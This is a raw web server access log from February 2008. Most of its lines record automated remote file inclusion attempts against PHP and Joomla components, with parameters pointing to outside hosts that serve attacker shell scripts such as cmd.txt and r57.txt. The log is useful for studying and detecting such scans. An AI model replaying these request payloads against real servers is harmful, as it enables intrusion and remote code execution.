222.96.156.153 - - [26/Feb/2008:07:29:22 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:29:22 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:07:29:25 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:30:00 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:07:30:08 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:07:30:08 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [26/Feb/2008:07:30:09 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:07:30:34 -0800] "GET /minamijewelry/?S=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:30:36 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:30:37 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:30:40 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:50 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:50 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:51 -0800] "GET /ipblock.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:51 -0800] "GET /config.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:51 -0800] "GET /logs/ipblock.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:30:51 -0800] "GET /logs/config.inc.php?path_escape=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:07:31:19 -0800] "GET //login.php?dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:07:31:29 -0800] "GET /maint/ftpmedia.php?_MG_CONF[path_html]=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:07:31:30 -0800] "GET /logs/maint/ftpmedia.php?_MG_CONF[path_html]=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.101.4.42 - - [26/Feb/2008:07:32:18 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:32:28 -0800] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:32:28 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:32:29 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:07:33:16 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:07:33:59 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:07:34:07 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:07:34:07 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:07:34:08 -0800] "GET /logs/access_071124.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:07:34:09 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:35:52 -0800] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:35:52 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.42.89 - - [26/Feb/2008:07:36:28 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
72.51.42.89 - - [26/Feb/2008:07:36:28 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
200.21.4.66 - - [26/Feb/2008:07:36:46 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.4.66 - - [26/Feb/2008:07:36:47 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.4.66 - - [26/Feb/2008:07:36:47 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:07:36:48 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:07:36:49 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [26/Feb/2008:07:37:16 -0800] "GET /logs/access_071220.log/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:38:36 -0800] "GET /logs/access_071216.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:38:36 -0800] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:38:36 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [26/Feb/2008:07:39:20 -0800] "GET /logs/access_080122.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.4.66 - - [26/Feb/2008:07:39:44 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.63.242.108 - - [26/Feb/2008:07:40:08 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://62.75.146.155/~unown/php/r.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:40:14 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:40:14 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:40:14 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:42:02 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://geocities.com/kawats/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [26/Feb/2008:07:42:08 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.97.0.11 - - [26/Feb/2008:07:42:08 -0800] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.angelfire.com/linux/ryu1/117.gif?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:42:15 -0800] "GET /modules/My_eGallery/index.php?basepath=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.85.129 - - [26/Feb/2008:07:42:52 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:42:58 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:42:58 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:42:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.108 - - [26/Feb/2008:07:43:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.97 - - [26/Feb/2008:07:43:31 -0800] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.182 - - [26/Feb/2008:07:43:51 -0800] "GET /logs/access_080118.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.59 - - [26/Feb/2008:07:44:00 -0800] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:44:07 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:44:07 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:44:08 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:44:42 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:07:44:51 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:07:44:51 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [26/Feb/2008:07:44:51 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.25.120.246 - - [26/Feb/2008:07:45:46 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:07:45:47 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:45:54 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:46:10 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:46:10 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [26/Feb/2008:07:46:11 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://projectsupermarket.com/directory2/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.103.128.44 - - [26/Feb/2008:07:46:39 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:07:46:39 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.91.228.154 - - [26/Feb/2008:07:46:56 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.43.191.180 - - [26/Feb/2008:07:50:25 -0800] "GET /logs/access.log/payment/amember.php?payment=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.43.191.180 - - [26/Feb/2008:07:50:25 -0800] "GET /payment/amember.php?payment=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.43.191.180 - - [26/Feb/2008:07:50:25 -0800] "GET /logs/payment/amember.php?payment=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [26/Feb/2008:07:51:41 -0800] "GET /include.php?path[docroot]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:07:51:50 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
195.43.191.180 - - [26/Feb/2008:07:52:37 -0800] "GET /logs/access_080118.log/payment/amember.php?payment=http://politics.wwf.gr/help/css/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.136.250.22 - - [26/Feb/2008:07:53:18 -0800] "GET /logs/access_080131.log/scanhttp://www.leakdoctor.co.kr/shop/pro/on.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [26/Feb/2008:07:53:21 -0800] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
61.19.158.41 - - [26/Feb/2008:07:53:21 -0800] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
219.136.250.22 - - [26/Feb/2008:07:53:24 -0800] "GET /scanhttp://www.leakdoctor.co.kr/shop/pro/on.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.136.250.22 - - [26/Feb/2008:07:53:25 -0800] "GET /logs/scanhttp://www.leakdoctor.co.kr/shop/pro/on.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.168.74.131 - - [26/Feb/2008:07:53:58 -0800] "GET /index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.168.74.131 - - [26/Feb/2008:07:54:00 -0800] "GET /logs/index.php?sourcedir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:54:43 -0800] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
85.119.152.152 - - [26/Feb/2008:07:54:43 -0800] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://gnome.org.ua//components/com_zoom/classes/iptc//makernotes/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
219.136.250.22 - - [26/Feb/2008:07:55:17 -0800] "GET /scanhttp://www.leakdoctor.co.kr/shop/pro/on.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:55:40 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:55:40 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [26/Feb/2008:07:55:41 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://x.apescar.net/r1.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:57:41 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:57:41 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:07:57:41 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:07:57:47 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.226.112.11 - - [26/Feb/2008:07:58:37 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.5; .NET CLR 2.0.50727)" "www.dmulk.com"
8.6.221.100 - - [26/Feb/2008:07:58:53 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:07:59:08 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:07:59:09 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [26/Feb/2008:07:59:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.leakdoctor.co.kr/shop/pro/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.226.112.11 - - [26/Feb/2008:07:59:14 -0800] "GET /bikes/CreSTOC07/CreSTOC2007077.jpg HTTP/1.1" 200 720896 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.5; .NET CLR 2.0.50727; yplus 5.1.04b)" "www.dmulk.com"
219.136.250.22 - - [26/Feb/2008:07:59:34 -0800] "GET /logs/access_080211.log/scanhttp://www.leakdoctor.co.kr/shop/pro/on.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:07:59:41 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
